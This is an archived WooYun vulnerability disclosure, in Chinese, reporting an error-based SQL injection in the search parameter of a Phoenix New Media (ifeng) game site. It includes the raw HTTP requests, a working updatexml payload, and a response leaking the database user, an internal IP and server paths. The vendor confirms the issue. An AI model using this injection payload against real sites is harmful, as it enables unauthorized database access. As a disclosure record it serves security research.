当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099309

漏洞标题:凤凰网报错mysql注入直接查询SQL

相关厂商:凤凰网

漏洞作者: Forever80s

提交时间:2015-03-04 09:42

修复时间:2015-04-18 09:44

公开时间:2015-04-18 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-18: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

网站:sy.ifeng.com
参数q

GET /service/searchgames?q=3'&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://g.ifeng.com/search-list.shtml?q=3
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: sy.ifeng.com
Accept-Encoding: gzip, deflate
<h3>Exception information:</h3>
<p>
<b>Message:</b> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near '%' or en_name like '%3'%' or categorys.category_name like '%3'%') )' at line 1
</p>
<h3>Stack trace:</h3>
<pre>#0 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Statement.php(300): Zend_Db_Statement_Pdo->_execute(Array)
#1 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Statement->execute(Array)
#2 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query(' select count(D...', Array)
#3 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Abstract->query(' select count(D...', Array)
#4 /data/ifengsite/htdocs/sy.ifeng.com/application/models/Game.php(459): Zend_Db_Adapter_Abstract->fetchOne(' select count(D...')
#5 /data/ifengsite/htdocs/sy.ifeng.com/application/controllers/ServiceController.php(331): Model_Game->searchGames('android', Array, 'null', 'null', 0)
#6 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Action.php(516): ServiceController->searchgamesAction()
#7 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Dispatcher/Standard.php(295): Zend_Controller_Action->dispatch('searchgamesActi...')
#8 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object
(Zend_Controller_Response_Http))
#9 /data/ifengsite/htdocs/sy.ifeng.com/application/Bootstrap.php(109): Zend_Controller_Front->dispatch()
#10 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Application.php(366): Bootstrap->run()
#11 /data/ifengsite/htdocs/sy.ifeng.com/public/index.php(20): Zend_Application->run()
#12 {main}
</pre>
<h3>Request Parameters:</h3>
<pre>array(7) {
["controller"]=>
string(7) "service"
["action"]=>
string(11) "searchgames"
["module"]=>
string(7) "default"
["q"]=>
string(2) "3'"
["pageindex"]=>
string(4) "null"
["pagesize"]=>
string(4) "null"
["jsoncallback"]=>
string(12) "viewGameList"
}


终于弄出来poc了,ifeng5个站搞出来一个站的poc

ET /service/searchgames?q=x'and(updatexml(1,concat(0x7e,(user()),0x7e),1))or'x&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://g.ifeng.com/search-list.shtml?q=3
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: sy.ifeng.com
Cookie: PHPSESSID=helc1fc5c7bvod0e0ktb282fr6; _plst[_plid_]=2892439417; _plst[others][_pllv_]=13
Accept-Encoding: gzip, deflate
Date: Tue, 03 Mar 2015 12:07:34 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"; "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>凤凰网游戏中心联运系统</title>
</head>
<body>
<h1>An error occurred</h1>
<h2>Application error</h2>


<h3>Exception information:</h3>
<p>
<b>Message:</b> SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~ifeng_cg_game@192.168.35.215~'
</p>
<h3>Stack trace:</

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-04 13:36

厂商回复:

非常感谢,我们正在处理。

最新状态:

暂无


漏洞评价:

评论